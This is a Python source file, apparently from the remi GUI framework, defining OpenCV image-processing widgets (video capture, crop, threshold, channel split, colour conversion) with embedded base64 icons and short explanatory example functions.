icon = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFoAAAAuCAYAAACoGw7VAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAKyAAACsgBvRoNowAAABl0RVh0U29mdHdhcmUAd3d3Lmlua3NjYXBlLm9yZ5vuPBoAAAXdSURBVHic7ZptTFNnFMf/z21rX1baQi0MBGojoesUJeJLNBhw6oddk5YuY2LMMjMSzLIYDCZLtsTEGbPpwvi0LQsSpgkpYRFDhpGYRVCnxCWObTi/YJ2ogKuDXspLwd7bPvsAmikKvaXlUuD3pcl9Oed//3l67rknD8ESMcXpdBqDweApIrWQ+U5xcbGM5/kMnucZsfcSQjYyDFNJKdUtGf0SWJY1MwzzPiHkHUqpiRDCUEqp2DiEEA2ARAB98ujLjF92795tk8lkVZTSXADJABhCJtbi099IWTIaQFlZmeLRo0fVAN6mlKbEIseiLx1Op9MoCEILgDUA1DFK0ye6wC8kWJbNFQThJoA8xM5kAIu4dNjt9g8opScBhFsqPJRSr5gchJDXAJgAkEVn9NGjR5mOjo5vQ6HQe4SQpDBv8wDYc/78+SticpWVlSn6+vqOE0IORaVGFxUVrQqFQvnRiBVj1AAOUUpXUUqfMAwj/P8kpZTg+fdWcPL49yMjI59fvnx5PJKkDofjzagYbbfbP5n8Gy5UgsFgcNWFCxfuRxqA4Xn+BKXUEk1VS0yF4Xm+/N69ex39/f03BUFwUEplUotaiMj9fr+/vLw8KT09PY9l2R+2bdsWGB4e/lGr1VYSQh7MJnhBTw/e6ukBAFxLS8PPmZkAgDvFdzCwZgAAkHUuC8v/XD7Lx5j/POuje3p6UF1dnVhaWppSU1PzUW9v7x+Dg4O/CYJgn3xJiCbN74eV42DlOKwYHX12fMgyBM7KgbNyGE+K6P0Sd0xp7wKBAFpbW+Wtra2JWVlZiXa7/cy6devGfD7fKZ1O9w0h5N9wg9dnZ6M+O3vK8byv8mYpO/6Yto92u92oqqoyaDQaQ0FBwadFRUUfcxz3u8FgOAngEiFE9ERrsRLWJ7jf70dLS4viwIEDxmPHju28evVqvc/nuz82NnaEUhpu07+oET3rcLvdqKysXH7w4MGMxsbGz7xeb9e+fftyYyFuIRHxJ/jg4CAaGhpUHo9HtX79elM0RS1EFvX0bi5ZMnqOWDJ6jpgXY1KLxYKSkhKkpaVBrY7u/D0QCODx48doa2vDlSuippxRRXKjLRYLKioq4HK50N3dHZMcKSkp2LlzJ6xWK6qrq2OSYyYkLx379+9HXV1dzEwGAI/HA5fLBavViuTk5JjlmQ5JjU5ISIBOp8ODB7OaXYUFpRSdnZ3IycmJea6XIanRK1eunBOTn+L1emEySdPyS146QqHQjNe0l7Sja2vXrHPxPI9ly5bNOk4kSG50OHCvc7hech1nj5wFl8pJLSci4sJoAOCVPLzpXjQfbkbbh20IqAJSSxJFxO2d2WyGw+Hwbdq0abyxsfFhNEVNx3jCONwb3eh9oxd5zXmwXbMBcTCsFWW0QqHA5s2bqcPh8JpMpod6vf5LmUx2rqmpqSJWAl8GZSj8ej9uvHsDt7ffxo6aHUjsS5xLCaIJy+jU1FSwLDtSWFjIA2jS6/XHCSF/Pz1vt9tjJnA6eBUP74qJcpLxVwby6/OhGFdIomUmXmk0wzDIycmhe/fuHUhPT/dptdpKhmHOEELG5lJgOIxrJ8uJbbKc/GKTWtIUphidlJSEXbt2jbAsO8YwzCW9Xv8FIeSWFOLEQGUT5aR9Tzs0Pg3MnWapJT2HHJjYZL127Vo4nU7OYrEMajSar5VK5WlCyOhMAeYLylElDP8YsL12O3T9OqnlTEGu0+k0tbW1AzKZrNVgMJwghHRILUoM8idyaIY02NqwFZm3MqWW80rkCoXisNForCOEDEktRgwkRKAeVmN122rkXswFCc3vPfVyQsh3UosQi3pYjdSuVOS78qEaUUktJywkn0eLQTmqhK5fh8LThfO+b36RuDCaCTLQerXId+XP6zo8HXFh9IbmDTA+NIIJxs1oZgpxYbSpO/63jcTvEokzorKiQ6HQRQDCjBe+gNlsztqyZUupzWbjo6FjJlQqlezu3bu/Ukp/EnMfwzBEEIT+2eT+D23+73+IM13aAAAAAElFTkSuQmCC"
@gui.decorate_constructor_parameter_types([int, int])
def __init__(self, video_source, framerate_hz, *args, **kwargs):
self.capture = cv2.VideoCapture(video_source)
self.thread_stop_flag = False
self.framerate = framerate_hz
self.frame_index = 0
self.last_frame = None
super(OpencvVideo, self).__init__("", *args, **kwargs)
self.thread = Thread(target=self.update)
self.thread.daemon = True
self.thread.start()
def set_image_data(self, image_data_as_numpy_array):
#overridden to store the frame without triggering an update
self.img = image_data_as_numpy_array
def search_app_instance(self, node):
if issubclass(node.__class__, remi.server.App):
return node
if not hasattr(node, "get_parent"):
return None
return self.search_app_instance(node.get_parent())
def __del__(self):
self.thread_stop_flag = True
super(OpencvVideo, self).__del__()
def update(self, *args):
while not self.thread_stop_flag:
time.sleep(1.0/self.framerate)
if self.app_instance==None:
self.app_instance = self.search_app_instance(self)
if self.app_instance==None:
continue
with self.app_instance.update_lock:
self.frame_index = self.frame_index + 1
self.app_instance.execute_javascript("""
var url = '/%(id)s/get_image_data?index=%(frame_index)s';
var xhr = new XMLHttpRequest();
xhr.open('GET', url, true);
xhr.responseType = 'blob'
xhr.onload = function(e){
var urlCreator = window.URL || window.webkitURL;
urlCreator.revokeObjectURL(document.getElementById('%(id)s').src);
var imageUrl = urlCreator.createObjectURL(this.response);
document.getElementById('%(id)s').src = imageUrl;
}
xhr.send();
""" % {'id': id(self), 'frame_index':self.frame_index})
def get_image_data(self, index=0):
try:
ret, frame = self.capture.read()
if ret:
self.set_image_data(frame)
self.on_new_image()
ret, png = cv2.imencode('.png', frame)
if ret:
headers = {'Content-type': 'image/png'}
# tostring is an alias to tobytes, which wasn't added till numpy 1.9
return [png.tostring(), headers]
except:
print(traceback.format_exc())
return None, None
class OpencvCrop(OpencvImRead):
""" OpencvCrop widget.
Crops an image.
Receives an image on on_new_image_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
icon = "data:image/png;base64,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"
@gui.decorate_constructor_parameter_types([int, int, int, int])
def __init__(self, x, y, w, h, *args, **kwargs):
self.x = x
self.y = y
self.w = w
self.h = h
super(OpencvCrop, self).__init__("", *args, **kwargs)
def on_new_image_listener(self, emitter): #CROP
if emitter.img is None:
return
self.img = emitter.img[self.y:self.y+self.h, self.x:self.x+self.w] #numpy images are indexed as [rows(y), cols(x)]
self.set_image_data(self.img)
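# --- added note and example on crop indexing (self-contained, made-up sizes) ---
# OpenCV images are numpy arrays indexed as img[row, col], i.e. img[y, x], so a
# crop of width w and height h at position (x, y) is the slice img[y:y+h, x:x+w],
# which matches the listener above.
def _example_crop_indexing():
    import numpy as np
    img = np.zeros((480, 640, 3), dtype=np.uint8)   # a 640x480 BGR image
    x, y, w, h = 100, 50, 200, 120
    roi = img[y:y+h, x:x+w]
    assert roi.shape[:2] == (120, 200)              # (rows, cols) == (h, w)
    return roi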
class OpencvThreshold(OpencvImRead):
""" OpencvThreshold widget.
Applies a threshold to an image.
Receives an image on on_new_image_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
icon = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADwAAAAuCAYAAAB04nriAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAETSURBVGhD7ZYBDsMgCEV197+zG+m60EwBHXaCvKRZslnhlT/TnFIqr2sbHu/PbdhO+BLpUnymO2fQPIhIe0ccaRwLjIW/QXekW7IA9duKqETakjQrbG2CHHFKe4cVlpzCll5YzEwYzhJ8jSISpiZ4x3RrgqPScNen4xWjSYlJ+8V7LBtpaJKb4siUlxOWiP4C7PzXSGvIcX3jGiJhrqmRB6U9RaoHXIuMNCyUNHauk6wFpOtm0BQebYq7b5asdN8phxYUrzUwS7aHqrBWY+c+rQegjaTGl7B2Y3eIYrh6UyK9Mhfhu6cxC8pj7wl7ojXlmLAnalOGb/pfhA0TkfZOCHsnhL0Twt4JYe+EsHdC2DcpPQHUiTG7/qs9SwAAAABJRU5ErkJggg=="
@gui.decorate_constructor_parameter_types([int])
def __init__(self, threshold_value, *args, **kwargs):
self.threshold_value = threshold_value
super(OpencvThreshold, self).__init__("", *args, **kwargs)
def on_new_image_listener(self, emitter): #THRESHOLD
if emitter.img is None:
return
img = emitter.img
if len(img.shape)>2:
img = cv2.cvtColor(emitter.img, cv2.COLOR_BGR2GRAY)
res, self.img = cv2.threshold(img,self.threshold_value,255,cv2.THRESH_BINARY)
self.set_image_data(self.img)
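# --- added example: cv2.threshold semantics (a small self-contained sketch) ---
# cv2.threshold returns a (retval, dst) pair; with THRESH_BINARY every pixel
# above the threshold becomes 255 and every other pixel becomes 0, which is the
# binarization applied by the widget above. The pixel values are illustrative.
def _example_threshold():
    import cv2
    import numpy as np
    gray = np.array([[10, 120, 200]], dtype=np.uint8)
    ret, binary = cv2.threshold(gray, 100, 255, cv2.THRESH_BINARY)
    assert binary.tolist() == [[0, 255, 255]]
    return binary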
'''
class OpencvSimpleBlobDetector(OpencvImRead):
""" OpencvSimpleBlobDetector widget.
Detects blobs in an image.
Receives an image on on_new_image_listener.
The event on_blobs_detected can be connected to a listener further processing
"""
icon = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADwAAAAuCAYAAAB04nriAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAETSURBVGhD7ZYBDsMgCEV197+zG+m60EwBHXaCvKRZslnhlT/TnFIqr2sbHu/PbdhO+BLpUnymO2fQPIhIe0ccaRwLjIW/QXekW7IA9duKqETakjQrbG2CHHFKe4cVlpzCll5YzEwYzhJ8jSISpiZ4x3RrgqPScNen4xWjSYlJ+8V7LBtpaJKb4siUlxOWiP4C7PzXSGvIcX3jGiJhrqmRB6U9RaoHXIuMNCyUNHauk6wFpOtm0BQebYq7b5asdN8phxYUrzUwS7aHqrBWY+c+rQegjaTGl7B2Y3eIYrh6UyK9Mhfhu6cxC8pj7wl7ojXlmLAnalOGb/pfhA0TkfZOCHsnhL0Twt4JYe+EsHdC2DcpPQHUiTG7/qs9SwAAAABJRU5ErkJggg=="
@gui.decorate_constructor_parameter_types([int])
def __init__(self, *args, **kwargs):
super(OpencvSimpleBlobDetector, self).__init__("", *args, **kwargs)
def on_new_image_listener(self, emitter): #BLOB DETECTION
if emitter.img is None:
return
img = emitter.img
self.set_image_data(self.img)
params = cv2.SimpleBlobDetector_Params()
params.filterByCircularity = False
params.filterByConvexity = False
params.filterByInertia = False
# The logos appear in white
params.minThreshold = 100 # the graylevel of images
params.maxThreshold = 255
params.filterByColor = False
#params.blobColor = 255
# Filter by Area
params.filterByArea = True
params.minArea = 20
detector = cv2.SimpleBlobDetector_create(params) #SimpleBlobDetector()
# Detect blobs.
keypoints = detector.detect(img.astype(np.uint8))
for k in keypoints:
cv2.circle(img, (int(k.pt[0]), int(k.pt[1])), 20, (255,0,0), 5)
'''
class OpencvSplit(OpencvImRead):
""" OpencvSplit widget.
Splits the image into its channels and dispatches each one through a dedicated event.
Receives an image on on_new_image_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
The events:
- on_new_image_first_component
- on_new_image_second_component
- on_new_image_third_component
dispatch each one a single channel.
"""
icon = "data:image/png;base64,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"
@gui.decorate_constructor_parameter_types([])
def __init__(self, *args, **kwargs):
super(OpencvSplit, self).__init__("", *args, **kwargs)
self.on_new_image_first_component.do = self.do_first
self.on_new_image_second_component.do = self.do_second
self.on_new_image_third_component.do = self.do_third
def on_new_image_listener(self, emitter):
self.image_source = emitter
self.set_image_data(emitter.img)
if not self.on_new_image_first_component.callback is None:
self.on_new_image_first_component()
if not self.on_new_image_second_component.callback is None:
self.on_new_image_second_component()
if not self.on_new_image_third_component.callback is None:
self.on_new_image_third_component()
def do_first(self, callback, *userdata, **kwuserdata):
#this method gets called when an event is connected, making it possible to execute the process chain directly, before the event triggers
if hasattr(self.on_new_image_first_component.event_method_bound, '_js_code'):
self.on_new_image_first_component.event_source_instance.attributes[self.on_new_image_first_component.event_name] = self.on_new_image_first_component.event_method_bound._js_code%{
'emitter_identifier':self.on_new_image_first_component.event_source_instance.identifier, 'event_name':self.on_new_image_first_component.event_name}
self.on_new_image_first_component.callback = callback
self.on_new_image_first_component.userdata = userdata
self.on_new_image_first_component.kwuserdata = kwuserdata
#here the callback is called immediately to make it possible to link to the plc
if callback is not None: #protection against the callback replacements in the editor
if hasattr(self, "image_source"):
if not self.image_source.img is None:
self.img = cv2.split(self.image_source.img)[0]
callback(self, *userdata, **kwuserdata)
@gui.decorate_set_on_listener("(self, emitter)")
@gui.decorate_event
def on_new_image_first_component(self):
if hasattr(self, "image_source"):
if not self.image_source.img is None:
self.img = cv2.split(self.image_source.img)[0]
return ()
def do_second(self, callback, *userdata, **kwuserdata):
#this method gets called when an event is connected, making it possible to execute the process chain directly, before the event triggers
if hasattr(self.on_new_image_second_component.event_method_bound, '_js_code'):
self.on_new_image_second_component.event_source_instance.attributes[self.on_new_image_second_component.event_name] = self.on_new_image_second_component.event_method_bound._js_code%{
'emitter_identifier':self.on_new_image_second_component.event_source_instance.identifier, 'event_name':self.on_new_image_second_component.event_name}
self.on_new_image_second_component.callback = callback
self.on_new_image_second_component.userdata = userdata
self.on_new_image_second_component.kwuserdata = kwuserdata
#here the callback is called immediately to make it possible to link to the plc
if callback is not None: #protection against the callback replacements in the editor
if hasattr(self, "image_source"):
if not self.image_source.img is None:
self.img = cv2.split(self.image_source.img)[1]
callback(self, *userdata, **kwuserdata)
@gui.decorate_set_on_listener("(self, emitter)")
@gui.decorate_event
def on_new_image_second_component(self):
if hasattr(self, "image_source"):
if not self.image_source.img is None:
self.img = cv2.split(self.image_source.img)[1]
return ()
def do_third(self, callback, *userdata, **kwuserdata):
#this method gets called when an event is connected, making it possible to execute the process chain directly, before the event triggers
if hasattr(self.on_new_image_third_component.event_method_bound, '_js_code'):
self.on_new_image_third_component.event_source_instance.attributes[self.on_new_image_third_component.event_name] = self.on_new_image_third_component.event_method_bound._js_code%{
'emitter_identifier':self.on_new_image_third_component.event_source_instance.identifier, 'event_name':self.on_new_image_third_component.event_name}
self.on_new_image_third_component.callback = callback
self.on_new_image_third_component.userdata = userdata
self.on_new_image_third_component.kwuserdata = kwuserdata
#here the callback is called immediately to make it possible to link to the plc
if callback is not None: #protection against the callback replacements in the editor
if hasattr(self, "image_source"):
if not self.image_source.img is None:
self.img = cv2.split(self.image_source.img)[2]
callback(self, *userdata, **kwuserdata)
@gui.decorate_set_on_listener("(self, emitter)")
@gui.decorate_event
def on_new_image_third_component(self):
if hasattr(self, "image_source"):
if not self.image_source.img is None:
self.img = cv2.split(self.image_source.img)[2]
return ()
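# --- added example: cv2.split on a BGR image (illustrative data) ---
# cv2.split returns one single-channel array per channel in storage order
# (B, G, R for images loaded with cv2.IMREAD_COLOR); indices 0, 1 and 2 are
# what the three component events above hand out.
def _example_split():
    import cv2
    import numpy as np
    bgr = np.zeros((4, 4, 3), dtype=np.uint8)
    bgr[..., 0] = 255                    # turn the blue channel fully on
    b, g, r = cv2.split(bgr)
    assert b.max() == 255 and g.max() == 0 and r.max() == 0
    return b, g, r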
class OpencvCvtColor(OpencvImRead):
""" OpencvCvtColor widget.
Converts the image colorspace.
Receives an image on on_new_image_listener.
The event on_new_image can be connected to other Opencv widgets for further processing
"""
cvt_types = {'COLOR_BGR2HSV':cv2.COLOR_BGR2HSV,'COLOR_HSV2BGR':cv2.COLOR_HSV2BGR, 'COLOR_RGB2BGR':cv2.COLOR_RGB2BGR, 'COLOR_RGB2GRAY':cv2.COLOR_RGB2GRAY, 'COLOR_BGR2GRAY':cv2.COLOR_BGR2GRAY, 'COLOR_RGB2HSV':cv2.COLOR_RGB2HSV}
icon = "data:image/png;base64,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